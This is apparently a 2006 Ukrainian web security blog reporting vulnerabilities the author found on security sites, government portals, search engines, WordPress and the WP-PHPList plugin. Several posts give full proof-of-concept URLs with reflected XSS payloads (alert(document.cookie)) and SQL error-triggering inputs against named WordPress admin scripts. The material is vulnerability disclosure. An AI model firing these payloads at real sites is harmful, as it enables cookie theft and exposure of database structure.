Websecurity - Веб безпека

В браузері Firefox 2.0, який нещодавно вийшов, знайдена уразливість, яка призводить до відмови браузеру (DoS).

Уразливими є Firefox версії 1.5.0.7 та нижче, та 2.0. Помилка призводить до Denial of Services (лише DoS, виконання коду не відтверджене).

Як я перевірив в Firefox 2.0 - експлоіт працює, браузер вилітає . При цьому зазначу, що Mozilla 1.7 не вразлива до цієї помилки - дана версія Mozilla не вилітає. В цьому плані стара версія Мозіли перевершила більш нову (найостаннішу) версію Firefox.

Протестуйте ваш браузер: Mozilla Firefox <= 1.5.0.7/ 2.0 (createRange) Remote DoS Exploit.

Зустрівся меня сьогодні на сайті ha.ckers.org цікавий комікс - PHP CMS XSS.

Про те як помічник MS Office намагається допомогти в написанні CMS на PHP - автоматично вставивши Cross Site Scripting уразливості

Хорошого вам настрою . І вдачних php розробок.

09.09.2006

Як можна було помітити з новин, я знайшов чимало уразливостей на сайтах присвячених темі безпеки.

Це в мене хобі таке з’явилося останнім часом - шукати дири в секюріти сайтах. Окрім загального пошуку уразливостей.

Зокрема уразливості на:

• security.com.ua
• www.catalog-security.com.ua
• www.nsa.gov

Причому ще чимало сайтів з безпеки очікують на те, щоб опинитися в моїх новинах - уразливості на яких я знайшов в серпні й вересні (на додачу до вищезгаданих сайтів). Так що список дирявих сайтів з безпеки буде постійно поповнюватися Така вже тенденція в моїх секюріти дослідженнях.

Тому security сайтам потрібно приділяти увагу власній безпеці.

30.10.2006

Продовжимо тему уразливостей на сайтах про безпеку.

За останній час я виявив проблеми з безпекою на наступних сайтах:

• www.securityfocus.com
• www.cybersecurity.ru
• bezpeka.com

Security проектам потрібно приділяти більше уваги власній безпеці.

12.10.2006

На доданок до вже згадуваної мною теми про Cross-Site Scripting в phplist, повідомлю про ще одну уразливість - в продукті який базується на phplist - це XSS в WP-PHPList.

Як раз вчора, коли проводив деякі додаткові дослідження з приводу поширення phplist в мережі і відповідно наявності великої кількості уразливих сайтів, я виявив що є ще один програмний продукт який також уразливий до даної XSS. Уразлива WP-PHPList 2.10.2 (та попередні версії), яка базується на phplist 2.10.2.

WP-PHPList - це плагін для WordPress, який надає функціональність системи phplist для движка WP.

Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам плагіна. Автора phplist я вже сповістив.

29.10.2006

Уразливість в параметрі unsubscribeemail в скрипті wp-phplist.php.

XSS:

http://host/wp-phplist.php?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Автор WP-PHPList так і не відповів мені, і не випустив оновлення свого плагіна. Тому користувачам WP-PHPList потрібно буде власноруч виправити уразливість в плагіні.

Cross-Site Scripting стає все більш поширеним. В своєму записі XSS in Quicktime, як я давно планував розповісти, RSnake згадує про дослідження pdp, стосовно XSS в Quicktime роликах. Як повідомив автор дослідження, він виявив можливість включення коду в Quicktime файл, який будучі розміщеним на веб сторінці, приведе до виконання коду (XSS), при перегляді цієї сторінки відвідувачем.

Про сайт pdp та його дослідження, я вже згадував раніше (gnucitizen.org - блог про веб безпеку).

Зокрема я зверну увагу на дослідження pdp стосовно включення XSS коду в такі об’єкти як Flash та QuickTime:

• Backdooring Flash Objects (the receipt) (деталі)
• Backdooring QuickTime Movies (деталі)

Включення XSS в Flash та QuickTime дозволяє проводити серйозні атаки, і надає додаткових векторів для подібних атак (і може застосовуватися, там де є фільтрація XSS з інших джерел інформації).

Cross-Site Scripting у Flash, тепер ось в Quicktime. Що далі? Вектори XSS атак доволі різноманітні, про що я буду додатково розоповідати.

Новий тест для вашого браузера. На це раз для Mozilla, Firefox та Internet Explorer.

Даний тест повинен привести до припинення роботи вашого браузера (зависне браузер) - це DoS атака. Можете перевірити, чи вразливий саме ваш браузер (вашої версії) до даної атаки. Сам тест представляє собою простенький ява-скрипт, який нагадає вашому браузеру де зимують раки (суть атаки зводиться до генерації максимально можливої кількості вікон браузера - поки він не зависне).

Це трохи інший тест, ніж попередній в IE (Переповнення буфера в Internet Explorer). Не такий ефектний - всього лише DoS. Але зато отдразу в різних браузерах: в Mozilla, Firefox та IE (в Opera не тестував, можете самі перевірити).

Як показали мої перевірки - цей експлоіт підвисає браузери. В мене він підвісив і Mozilla і Firefox. Причому зауважу, що на одному сайті, де я довідався про дану атаку, писалося що вразливий саме Internet Explorer. Але в мене IE не підвісив (IE під XP SP2), зато підвісив Mozilla з Firefox. Лише відкрило масу вікон в IE, забравши частину оперативної пам’яті, але не всю, тому на ПК з меншою кількістю пам’яті, можливий інший ефект. Тому тестуйте свої браузери. І обновлюйте їх, якщо тест покаже невтішні результати.

Протестуйте ваш браузер: Mozilla Firefox IE DoS Exploit.

16.10.2006

До движка WordPress та плагінів під нього в мене особлива і підвищена увага - і я ругялярно провожу аудит безпеки WP (та його плагінів), тому що мій власний сайт базується на даному движку. І можу сказати, що WordPress, в якому нечасто знаходять уразливості (рідко ви про це прочитаєте в новинах секюріті сайтів), і саме за це я і вибрав даний движок, все ж таки має чимало уразливостей.

І чим більше я досліджую його, тим більше уразливостей знаходжу. Особливо уразливими є плагіни (які компроментують движок і сайт у цілому), зокрема плагіни сторонніх розробників, про що в новинах я писав неодноразово, але й в самому движку також є вразливості (і в тому ж плагіні WP-DB Backup, який входить до стандартної поставки движка WP).

До вже згаданих уразливостей в WordPress та його плагінах (Cross-Site Scripting в WP-PHPList, Уразливості в Subscribe To Comments WordPress plugin та Уразливість в Wordpress WP-DB Backup Plugin), я повідомляю про численні уразливості в самому Wordpress (а також в інших плагінах, з числа тих, якими я користуюся, і про що я окремо повідомлю).

Це зокрема Cross-Site Scripting уразливості в адмінці WP, які я зайшов в серпні (3 XSS) і вересні (2 XSS, а також одна SQL DB Structure Extraction). Це лише частина усіх знайдених мною уразливостей в Wordpress (вразливі версії до 2.0.3 включно, і може 2.0.4). Про ті уразливості (й їх чимало), що я знайшов в жовтні, а також про уразливсоті в інших плагінах для WP, я розповім окремо.

Найближчим часом я повідомлю деталі, але спочатку пофіскю ці всі уразливості на своєму сайті (тому за них не переживайте ), а також повідомлю розробникам WordPress і всім тим людям, яким я попередньо вже про ці уразливості розповів, включаючи розробників WP. Зараз залишилося написати їм всім деталі уразливостей (ну і підготую рекомендації по їх виправленню).

17.10.2006

Додам ще про нові уразливості в WordPress (і які мали місце на моєму сайті), про які я також найближчим чамосом повідомлю розробникам цього движка.

Вчора Андрій, який якраз завітав подякувати мені за інформацію про уразливості на його сайті, повідомив мені, що він знайшов дві уразливості в мене на сайті. Що звичайно мене зацікавило . Так от, після отримання детальної інформації від Андрія і перевірки, виявилось що на моєму сайті (в движку WP) є дві уразливості: SQL DB Structure Extraction (а не SQL Injection, як думав Андрій) та XSS - в пошуці по сайту.

Причому він використував дуже хитрий метод пошуку цих уразливостей. Який я планую додатково дослідити - це використання деяких специфічних символів, котрі при деяких випадках можуть привести до виведення помилки в SQL запиті - і відповідно до уразливостей SQL DB Structure Extraction та XSS.

Як я додатково перевірив різні скрипти, які входять до складу движка WordPress (в адмінці і в плагінах), ця уразливість також має місце окрім пошуку по сайту, ще в ряді скриптів. Додатково уразливість проявляється в 5 скриптах - в суммі 8 уразливостей. Враховуючи дві попередні уразливості в пошуку, загалом маємо 10 уразливостей (SQL DB Structure Extraction та XSS). Про них я повідомлю деталі піздніше, після повідомлення розробникам WP. Ці уразливості я вже виправив на сайті, тому за них не переживайте.

Дані уразливості не торкаються всіх сайтів на движку WordPress. Вони спрацьовують лише при деяких налаштуваннях БД (налаштуваннях кодування), які мають місце на моєму сайті, і можуть бути також на деяких інших сайтах. Тому це лише поодинокий випадок, який тим не менш має свої ризики, що при деяких налаштуваннях MySQL, може відбуватися помилка в запиті до БД, що приводить до уразливостей (XSS + SQL DB Structure Extraction).

Детальна інформація.

Знайдено 24.08.2006.

XSS:

http://site/wp-admin/templates.php?file=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 29.08.2006.

XSS:

http://site/wp-admin/inline-uploading.php?action=upload&all=true&start=-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/inline-uploading.php?action=upload&all=true%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 01.09.2006.

XSS:

POST запит на сторінці http://site/wp-admin/link-import.php
<script>alert(document.cookie)<script>В полі: Вкажіть OPML URL.

Знайдено 16.09.2006.

XSS:

http://site/wp-admin/edit.php?m=&paged=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 27.09.2006.

SQL DB Structure Extraction:

http://site/wp-admin/edit.php?paged=-1

Знайдено 17.10.2006.

Дані уразливості працюють лише при специфічній конфігурації кодування на сайті (при специфічних налаштуваннях БД, в даному випадку MySQL). Коли на сайті наявне UTF-8 кодування, в БД встановлене інше кодування (наприклад, Windows-1251) і в коді движка задане примусове встановлення UTF-8 кодування.

SQL DB Structure Extraction:

http://site/?s=%A0
http://site/wp-admin/edit.php?s=%A0
http://site/wp-admin/edit-pages.php?s=%A0
http://site/wp-admin/edit-comments.php?s=%A0

XSS:

http://site/?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit-pages.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit-comments.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL DB Structure Extraction:

http://site/wp-admin/edit.php?page=subscribe-to-comments.php&email=%A0
http://site/wp-subscription-manager.php?page=subscribe-to-comments.php&email=%A0

Вчора до мене звернулися з проханням протестувати сайт Верховної Ради України (ВРУ) на уразливості (сайт http://portal.rada.gov.ua та зокрема http://zakon.rada.gov.ua). І як показав мій попередній секюріті аудит, результати невтішні і сайт Верховної Ради уразливий. В даному випадку я знайшов декілька Cross-Site Scripting уразливостей. Про що попередньо вже повідомив адміністрацію веб сайту, і зараз підготую детальний звіт.

Я регулярно провожу аудит безпеки різноманітних сайтів, як своїх власних, так і сайтів своїх партнерів, і тих сайтів, які мені на очі потрапляють. Ну а також іноді провожу аудит веб сайтів, веб додатків та веб систем на замовлення. Але до цього часу державний сектор вебу (gov) не залучав мою увагу (окрім випадку з сайтом Агентства Національної Безпеки США Cross-Site Scripting уразливість на www.nsa.gov, але в даному випадку це секюріті сайт, і звернув увагу саме через тематику сайту). І ось я оглянув один наш gov сайт - веб сайт Верховної Ради. Найвищого законодавчого органу держави - і тому сайт повинен бути взірцем безпеки.

Але результати невтішні - на сайті мають місце уразливості (і це був лише попередній огляд). Можна представити загальний стан серед державних gov сайтів в Україні (як мінімум, а то і по всьому світі можна екстраполювати). І цю ситуацію потрібно змінювати. Сайту Верховної Ради та іншим сайтам державних органів потрібно приділяти увагу безпеці та секюріті-аудиту. Я зі своєї сторони надам необхідні консультації, головне щоб уразливості оперативно виправляли і слідкували за безпекою.

В свої новинах я неодноразово згадував про пошукові системи і про уразливості в них. Особливо ця проблема стосується популярних пошукових систем та порталів, з численними веб проектами (як пошуковцями, так й іншими веб сервісами).

Зокрема згадував наступні випадки: Уразливість на lib.meta.ua, Уразливості на meta.ua, Cross-Site Scripting на Яндексі, Нові уразливості на Yandex, Cross-Site Scripting на Рамблері, Нова уразливість на Рамблер, Нова XSS уразливість на Рамблері, Уразливість на go.km.ru, XSS уразливість в Гуглі, XSS та CSRF уразливості в Google.

Як видно з моїх повідомлень наявність уразливостей - це поширене явище в багатьох пошуковцях і порталах. Я вже не кажу про пошукові скрипти на сайтах - там це теж поширене явище (і я регулярно пишу про це в новинах). Взагалі уразиливості в пошукових скриптах, як на сайтах, так і в веб сервісах пошуковців - це один з напрямків, де уразливості найбільш поширені.

Власникам та розробникам пошукових систем, особливо популярних пошувців і порталів, слід приділяти більше уваги безпеці власних веб систем.

До теми уразливостей в пошукових системах я ще буду регулярно звертатися. В мене вже чекає нова інформація про уразливості в пошуковцях. Як серед раніше згадуваних систем, так і нових.

Розповім вам про ще одні уразливості в Гуглі. В минулому місяці я вже писав про XSS уразливість в Гуглі, а зараж продовжу тему уразливостей на сайтах Гугла. Це відома в світі компанія та найпопулярнійший пошуковець, тому й зрозуміла увага, яку приділяють до сайтів Гугла дослідники. І тому сам Гугл повинен серйозно слідкувати за безпекою власних сайтів.

В цьому році в Google було знайдено чимало різноманітних уразливостей. Окрім вже згадуваного мною XSS в Гуглі, в своєму запису Cross Site Scripting Vulnerability in Google (датованого липнем цього року) RSnake повідомляє про нові уразливості в Гуглі (частина з яких вже виправлена). Зокрема про XSS та CSRF. А також про ще один редиректор (я вже писав про попередній редиректор в записі Фішинг за допомогою Yahoo та Google).

До редиректорів я ще поверусь окремо, в інших моїх дослідженнях, а зараз розглянемо XSS та CSRF уразливості.

XSS була знайдена в інструменті додавання RSS feed (в налаштуваннях Персональної сторінки Гугла). Зараз ця уразливість вже виправлена, але ви можете глянути на скріншот на сайті RSnake.

CSRF (Cross Site Request Forgery) була знайдена в інших персоналізованих налаштуваннях Гугла, що дозволяє довільному (зловмисному) сайту змінити дефолтну локацію пошуку по мапам.

В цьому році Гугл все частіше з’являється в новинах - з повідомленням про нові уразливості на їхніх сайтах. Інші пошуковці, до речі, теж не виключення.